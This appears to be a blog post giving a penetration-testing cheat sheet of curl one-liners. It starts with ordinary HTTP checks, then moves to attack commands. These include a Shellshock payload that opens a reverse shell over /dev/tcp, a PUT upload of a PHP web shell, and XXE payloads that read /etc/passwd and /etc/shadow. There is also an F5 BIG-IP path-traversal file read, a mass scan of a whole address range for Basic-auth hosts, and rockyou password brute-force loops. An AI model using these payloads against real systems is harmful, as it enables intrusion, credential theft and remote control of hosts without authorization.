In lot of scenarios, we usually don't have access to GUI access to web applications but in most of the scenarios - you can find curl installed on the test machine - so, below is a simple cheat sheet to run basic checks
#Get request using Curl curl -I http://10.10.10.10 # Send Post Request curl --data "param1=value1¶m2=value2" http://10.10.10.10 #Check for Trace Method curl -k -v -X TRACE http://10.10.10.10 #PUT Request curl -X PUT -d "PUT request data" http://10.10.10.10 curl -kL https://10.10.10.10 -T file.txt #HEAD Request curl -I http://10.10.10.10 #Test DEBUG Method --> if Response "OK" --> DEBUG is enabled curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug" #Ignore SSL warnings curl -k http://10.10.10.10 #Follow Redirection curl -L http://10.10.10.10 #Add headers in a JSON GET request curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10 #Add headers in a request XML GET request curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET http://10.10.10.10 #XML POST request curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>" https://10.10.10.10 #File Upload curl -X POST -d @filename http://10.10.10.10 #Proxy Testing curl -kL https://google.com --proxy http://10.10.10.10:443
Login and Session Management using CURL
#GET request Login using Curl
curl --user user:pass http://10.10.10.10
curl -u user:pass http://10.10.10.10
#JSON POST Request Login
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" --d'{"login":"my_login","password":"my_password"}' --user "login:password"
#Curl POST Request
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}'
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1¶m2=value2" https://10.10.10.10
#Save the session as cookie
curl --user user:pass --cookie-jar ./somefile https://10.10.10.10
#Login using the saved session
curl --cookie ./somefile https://10.10.10.10
#Login with Authorization: Basic
curl http://10.10.10.10/console --basic -v -u root:root
#Login with Digest Authorization
curl -v --digest --user 'admin:admin' http://10.10.10.10/console
#Upload a file using PUT method
curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://10.10.10.10/test/shell.php
Information Gathering using CURL
#Iterate a number from 1 to 20 in the given Variable and check the difference
for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>';done
#Get all the links from a page
curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
#get Text in much better readable Format
curl 10.11.1.71 -s -L | html2text -width '99' | uniq
#Finding Basic Authorization Hosts 100.64.0.0-100.127.255.255
parallel -j250 'if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:80 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}; fi; if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:8080 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt
Exploitation
#Exploiting ShellShock using CURL
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 " http://10.10.10.2:80/cgi-bin/user.sh
#XXE - When you find /soap or /soap/servlet/rpcrouter Directory
curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>'
curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>'
curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>'
#LFI on Apache httpd (F5 BIG-IP load balancer)
curl -kL --cipher 'DEFAULT:!DH' 'https://10.10.10.10/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Brute forcing using Curl
#One Liner
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done
#Better for readability
for pass in $(cat /usr/share/wordlists/rockyou.txt); do
http_code=$(curl https://10.10.10.10 -k --digest -u admin:"$pass" -w '%{http_code}' -o /dev/null -s )
if [[ $http_code -ne 401 ]]; then
echo "Password Cracked $pass"
break 2
elif [[ $http_code -eq 401 ]]; then
echo "Wrong Password: '$pass' --- '$http_code'"
fi
done
OpenSSL Errors
#Resolving SSL routines::dh key too small
curl https://10.10.10.10 -kL --cipher 'DEFAULT:!DH'
Comments
Post a Comment